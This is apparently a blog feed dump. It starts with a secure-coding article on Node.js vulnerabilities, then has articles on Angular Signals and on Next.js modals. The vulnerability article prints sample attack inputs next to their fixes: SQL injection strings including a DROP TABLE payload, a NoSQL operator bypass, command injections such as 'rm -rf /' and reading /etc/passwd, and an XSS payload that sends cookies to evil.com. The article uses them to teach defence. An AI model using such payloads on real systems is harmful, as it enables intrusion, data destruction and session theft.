  • Event Loop: The event loop is the heart of Node.js. It’s in charge of coordinating asynchronous I/O operations and preventing the application from becoming unresponsive. Node.js performs an asynchronous operation, such as file read or network request, and registers a callback function; then it carries on executing other code. Once the operation is complete, the callback function is queued up in the event loop, which then calls it.
  • Non-blocking I/O: Node.js uses non-blocking I/O operations so that the application does not become unresponsive when performing time-consuming operations. Node.js does not block the thread to wait for the operation to finish; instead, it carries on executing other code. This allows Node.js to handle many tasks concurrently on a single thread (see the sketch after this list).
  • Modules and Packages: Node.js has a large number of modules and packages that can be loaded into an application quite easily. The Node Package Manager (NPM) is currently the largest repository of open source software libraries in the world and is a treasure trove of modules that can help make your application better. However, the use of third-party packages also implies certain risks; if there is a vulnerability in a package, it can be easily exploited by an attacker.
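As a minimal illustration of the non-blocking model described in the second bullet (the file name is just a placeholder): the read is started, execution continues, and the callback runs later via the event loop.

const fs = require('fs');

// The read is handed off to Libuv; the callback is queued once the data is ready
fs.readFile('./config.json', 'utf8', (err, data) => {
  if (err) {
    console.error('Read failed:', err.message);
    return;
  }
  console.log('File contents arrived:', data.length, 'characters');
});

console.log('This line runs before the file has been read');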

Why Security is Crucial for Node.js Applications

As the usage of Node.js keeps on increasing, so does the need for strong security measures. The security of Node.js applications is important for several reasons:

  • Protecting Sensitive Data: Web applications often deal with sensitive data such as personal information, financial details, and login credentials. This data has to be protected to prevent unauthorized access and data breaches.
  • Maintaining User Trust: Users expect their data and activity on an application to be secure. A security breach can jeopardize users’ trust and the reputation of the organization.
  • Compliance with Regulations: Many industries are strictly regulated with respect to data security and privacy. Node.js applications must comply with such rules in order to avoid legal consequences and financial penalties.
  • Preventing Financial Loss: Security breaches are costly to organizations in terms of dollars and cents. These losses can be in the form of direct costs, such as fines and legal expenses, and indirect costs, including lost revenue and damage to the brand.
  • Mitigating Risks from Third-Party Packages: The use of third-party packages is common in Node.js applications, posing security risks. Flaws in these packages can be exploited by attackers to take over the application. It is crucial to update and scan these packages frequently to reduce these risks.

Common Vulnerabilities in Node.js Applications

Injection Attacks – SQL Injection

Overview: An SQL injection is a type of attack where an attacker can execute malicious SQL statements that control a web application’s database server. This is typically done by inserting or “injecting” malicious SQL code into a query.

Scenario 1: Consider a simple login form where a user inputs their username and password. The server-side code might look something like this:

const username = req.body.username;
const password = req.body.password;

const query = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

db.query(query, (err, result) => {
  if (err) throw err;
  // Process result
});

If an attacker inputs admin' -- as the username and leaves the password blank, the query becomes:

SELECT * FROM users WHERE username = 'admin' --' AND password = ''

The -- sequence comments out the rest of the query, allowing the attacker to bypass authentication.

Solution: To prevent SQL injection, use parameterized queries or prepared statements. This ensures that user input is treated as data, not executable code.

const username = req.body.username;
const password = req.body.password;

const query = 'SELECT * FROM users WHERE username = ? AND password = ?';

db.query(query, [username, password], (err, result) => {
  if (err) throw err;
  // Process result
});

Scenario 2: Consider a simple Express application that retrieves a user from a database:

const express = require('express');
const mysql = require('mysql');

const app = express();

// Database connection
const connection = mysql.createConnection({
  host: 'localhost',
  user: 'root',
  password: 'password',
  database: 'users_db'
});

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // VULNERABLE CODE: Direct concatenation of user input
  const query = "SELECT * FROM users WHERE id = " + userId;

  connection.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(3000);

The Attack

An attacker can exploit this by making a request like:

GET /user?id=1 OR 1=1

The resulting query becomes:

SELECT * FROM users WHERE id = 1 OR 1=1

Since 1=1 is always true, this returns ALL users in the database, exposing sensitive information.

More dangerous attacks might include:

GET /user?id=1; DROP TABLE users; --

This attempts to delete the entire users table.

Secure Solution

Here’s how to fix the vulnerability using parameterized queries:

app.get('/user', (req, res) => {
  const userId = req.query.id;

  // SECURE CODE: Using parameterized queries
  const query = "SELECT * FROM users WHERE id = ?";

  connection.query(query, [userId], (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

Best Practices to Prevent SQL Injection

  1. Use Parameterized Queries: Always use parameter placeholders (?) and pass values separately.
  2. ORM Libraries: Consider using ORM libraries like Sequelize or Prisma that handle parameterization automatically (see the sketch after this list).
  3. Input Validation: Validate user input (type, format, length) before using it in queries.
  4. Principle of Least Privilege: Database users should have minimal permissions needed for the application.
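As a hedged sketch of best practice 2, an ORM such as Sequelize builds parameterized queries for you; the model and connection details below are illustrative and not taken from the examples above.

const { Sequelize, DataTypes } = require('sequelize');

// Illustrative connection; credentials and database name are placeholders
const sequelize = new Sequelize('users_db', 'root', 'password', {
  host: 'localhost',
  dialect: 'mysql',
});

const User = sequelize.define('User', {
  username: DataTypes.STRING,
  password: DataTypes.STRING,
});

async function findUser(username, password) {
  // Sequelize generates a parameterized query; user input is never concatenated into SQL
  return User.findOne({ where: { username, password } });
}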


NoSQL Injection

Overview: NoSQL injection is similar to SQL injection but targets NoSQL databases like MongoDB. Attackers can manipulate queries to execute arbitrary commands.

Scenario 1: Consider a MongoDB query to find a user by username and password:

const username = req.body.username;
const password = req.body.password;

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

The Attack

If an attacker inputs { “$ne”: “” } as the password, the query becomes:

User.findOne({ username: 'admin', password: { "$ne": "" } }, (err, user) => {
  if (err) throw err;
  // Process user
});

This query returns the first user where the password is not empty, potentially bypassing authentication.

Solution: To prevent NoSQL injection, sanitize user inputs and use libraries like mongo-sanitize to remove any characters that could be used in an injection attack.

const sanitize = require('mongo-sanitize');

const username = sanitize(req.body.username);
const password = sanitize(req.body.password);

User.findOne({ username: username, password: password }, (err, user) => {
  if (err) throw err;
  // Process user
});

Scenario 2: Consider a Node.js application that allows users to search for products with filtering options:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // VULNERABLE CODE: Directly using user input in aggregation pipeline
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } }, // Dangerous!
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: err.message });
  }
});

The Attack

An attacker could send a malicious payload:

{
  "category": "electronics",
  "sortField": "$function: { body: function() { return db.getSiblingDB('admin').auth('admin', 'password') } }"
}

This attempts to execute arbitrary JavaScript in the MongoDB server through the $function operator, potentially allowing database access control bypass or even server-side JavaScript execution.

Secure Solution

Here’s the fixed version:

app.post('/products/search', async (req, res) => {
  const { category, sortField } = req.body;

  // Validate category
  if (typeof category !== 'string') {
    return res.status(400).json({ error: "Invalid category format" });
  }

  // Validate sort field against allowlist
  const allowedSortFields = ['name', 'price', 'rating', 'date_added'];
  if (!allowedSortFields.includes(sortField)) {
    return res.status(400).json({ error: "Invalid sort field" });
  }

  // SECURE CODE: Using validated input
  const pipeline = [
    { $match: { category: category } },
    { $sort: { [sortField]: 1 } },
    { $limit: 20 }
  ];

  try {
    const products = await productsCollection.aggregate(pipeline).toArray();
    res.json(products);
  } catch (err) {
    res.status(500).json({ error: "An error occurred" });
  }
});

Key Takeaways:

  1. Validates the data type of the category parameter.
  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.
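Beyond per-route validation, sanitization can also be applied globally. The following is a hedged sketch using the express-mongo-sanitize middleware, which strips keys beginning with $ or containing dots from incoming request payloads; this middleware is not part of the example above.

const express = require('express');
const mongoSanitize = require('express-mongo-sanitize');

const app = express();
app.use(express.json());

// Remove keys starting with '$' or containing '.' from req.body, req.query, and req.params
app.use(mongoSanitize());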

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Scenario 1: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {
  if (err) throw err;
  // Process stdout
});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // VULNERABLE CODE: Direct concatenation of user input into command
  const command = 'ping -c 4 ' + hostInput;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      res.status(500).send(`Error: ${stderr}`);
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command and then display the contents of the system’s password file, potentially exposing sensitive information. An even more destructive payload would be:

/ping?host=;rm -rf /*

This attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');
const { execFile } = require('child_process');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {
  const hostInput = req.query.host;

  // Input validation: Basic hostname format check
  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {
    return res.status(400).send('Invalid hostname format');
  }

  // SECURE CODE: Using execFile which doesn't invoke shell
  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {
    if (error) {
      res.status(500).send('Error executing command');
      return;
    }
    res.send(`<pre>${stdout}</pre>`);
  });
});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands (see the sketch after this list).
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.
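To make best practices 1 and 4 concrete, the directory-listing example from the beginning of this section can avoid the shell entirely by using the built-in fs API. The route and base directory below are assumptions for illustration, building on the Express app from the previous listings.

const fs = require('fs/promises');
const path = require('path');

app.get('/files', async (req, res) => {
  const dir = req.query.dir || '.';

  // Resolve against a fixed base directory and reject path traversal
  const base = path.resolve('/var/app/data');
  const target = path.resolve(base, dir);
  if (!target.startsWith(base)) {
    return res.status(400).send('Invalid directory');
  }

  try {
    // No shell is involved, so there is nothing to inject into
    const entries = await fs.readdir(target);
    res.json(entries);
  } catch {
    res.status(500).send('Could not read directory');
  }
});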


Cross-Site Scripting (XSS) Attacks

Cross-site scripting is one of the most common security vulnerabilities in web applications. It allows attackers to inject malicious scripts into web pages viewed by other users. These scripts are then executed in the context of the victim’s browser, which can result in data theft, session hijacking, and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input to build a web page.

How XSS Occurs

XSS attacks happen when an attacker is able to inject malicious scripts into a web application and those scripts are executed in the victim’s browser, allowing the attacker to perform actions on behalf of the user or steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.
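For completeness, here is a minimal illustration of the DOM-based variant, which never involves the server; the element ID and markup are purely illustrative:

// VULNERABLE: attacker-controlled URL fragment is written into the DOM as markup
document.getElementById('greeting').innerHTML =
  'Hello ' + decodeURIComponent(location.hash.slice(1));

// SAFER: treat the value as plain text instead of HTML
document.getElementById('greeting').textContent =
  'Hello ' + decodeURIComponent(location.hash.slice(1));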

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = req.body.comment;
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>
  <p>User comment: <script>alert('XSS');</script></p>
</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
const express = require('express');
const escapeHtml = require('escape-html');

const app = express();
app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {
  const comment = escapeHtml(req.body.comment);
  res.send(`<div><p>User comment: ${comment}</p></div>`);
});

app.listen(3000, () => {
  console.log('Server is running on port 3000');
});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');
const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE CODE: Directly embedding user input in HTML response
  res.send(`
    <h1>Search Results for: ${searchTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');
const app = express();

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Encoding special characters
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

2. Using Template Engines

const express = require('express');
const app = express();

app.set('view engine', 'ejs');
app.set('views', './views');

app.get('/search', (req, res) => {
  const searchTerm = req.query.q || '';

  // SECURE CODE: Using EJS template engine with automatic escaping
  res.render('search', { searchTerm });
});

3. Using Content Security Policy

const express = require('express');
const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers
app.use(helmet.contentSecurityPolicy({
  directives: {
    defaultSrc: ["'self'"],
    scriptSrc: ["'self'"],
    styleSrc: ["'self'"],
  }
}));

app.get('/search', (req, res) => {
  // Even with encoding, adding CSP provides defense in depth
  const searchTerm = req.query.q || '';
  const encodedTerm = searchTerm
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');

  res.send(`
    <h1>Search Results for: ${encodedTerm}</h1>
    <p>No results found.</p>
    <a href="/">Back to home</a>
  `);
});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Encode output according to the context in which it will be used: HTML, JavaScript, CSS, or URL.
  • Use security libraries: When rendering user-supplied HTML, use sanitization libraries such as DOMPurify, js-xss, or sanitize-html (see the sketch after this list).
  • Content Security Policy: Use CSP headers to restrict where scripts can be loaded from and when they can be executed.
  • Use modern frameworks: Frameworks like React, Vue, or Angular encode output for you by default.
  • X-XSS-Protection: This header can be used to enable the browser’s built-in XSS filters.
  • HttpOnly cookies: Mark sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.
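As a brief sketch of the security-library item above, sanitize-html can strip dangerous markup from user-supplied HTML before it is stored or rendered; the allowed tags below are just an example configuration.

const sanitizeHtml = require('sanitize-html');

const dirty = '<p>Nice post!</p><script>alert("XSS")</script>';
const clean = sanitizeHtml(dirty, {
  allowedTags: ['p', 'b', 'i', 'em', 'strong', 'a'],
  allowedAttributes: { a: ['href'] },
});

// clean now contains '<p>Nice post!</p>'; the script tag has been removed
console.log(clean);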

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.


Conclusion

Security requires a comprehensive approach that addresses all potential vulnerabilities. In this article, we discussed some of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Use parameterized queries instead of string concatenation.
  • Consider ORMs such as Sequelize or Prisma, which parameterize queries for you.
  • Validate all user inputs before processing them.
  • Apply the principle of least privilege for database access.

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Professional Tips for Using Signals in Angular https://javascript-conference.com/blog/signals-angular-tips/ Wed, 05 Mar 2025 13:30:01 +0000 https://javascript-conference.com/?p=107575 Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a state change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent the view of individual use cases on the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. First, they don’t offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions, and they cannot directly represent error states. Second, signals skip the intermediate states of directly consecutive value changes. This desired property is called “glitch free”.

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.
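A minimal sketch of this behavior, assuming an effect created in a component’s injection context (the component itself is purely illustrative):

import { Component, effect, signal } from '@angular/core';

@Component({
  selector: 'app-glitch-demo',
  standalone: true,
  template: '',
})
export class GlitchDemoComponent {
  counter = signal(1);

  constructor() {
    effect(() => {
      // The effect runs after the synchronous updates below and reports
      // only the final value (3), not the intermediate 2
      console.log('counter is', this.counter());
    });

    this.counter.set(2);
    this.counter.set(3);
  }
}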


Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That’s why they offer fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the signals originalName and englishName into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime, and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent request: switchMap aborts requests that have already been started, unless they have already completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store. However, in line with Figure 1, the component already hands over the execution of asynchronous tasks in the stage shown and receives signals at the end.


RxJS in Stores

RxJS is also frequently used in stores, for example in NgRx in combination with Effects. The NgRx Signal Store, in contrast, offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. As rxMethod automatically subscribes to this observable, the application code must receive the result of the data flow using tap or tapResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError, and finalize.

The consumer of a reactive method can pass a corresponding observable, a signal, or a specific value. The onInit hook shown passes the filter signal. This means that all values the signal picks up over time pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other. One of the two only flashes briefly before the other replaces it. Due to the asynchronous nature, the order in which the results arrive doesn’t have to match the order of the search queries.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag’s value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive, or even impossible, in a highly reactive UI that manages without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, as seen on the right in Figure 1. Real events, such as UI events or events represented with RxJS, are the better solution for transmitting an intention. There are several reasons for this: First, Signals’ glitch-free property can reduce consecutive changes to just the last change.

Consumers must subscribe to the Signal in order to be able to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are discouraged; by default, Angular even penalizes them with an exception. The Angular team wants to avoid confusing reactive chains – changes that lead to changes, which in turn lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component’s template lets you page between the data records. This logic is deliberately kept very simple for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When paging, the input signal id receives a new value. Now the question arises of how to trigger loading the respective data set when this kind of change occurs. The classic approach is the lifecycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there’s nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC proposes using effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the constructor transfers the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Error message when using effect

This problem arises because the entire load method, which writes to a Signal in the store, is executed in the reactive context of the effect. Angular therefore recognizes an effect that writes to a Signal, which is prevented by default for the reasons mentioned above. It also means that Angular triggers the effect again whenever a Signal read inside load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over into the load method. It can write to Signals, and the effect doesn’t register for Signals that load reads. Angular only triggers the effect again when the Signal id changes, since the effect reads it outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The created auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect triggers the transferred lambda expression using untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, explicitly declaring the Signals to be tracked corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown here is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.


To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to display events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but they add unnecessary complexity for something as simple as opening or closing a modal.

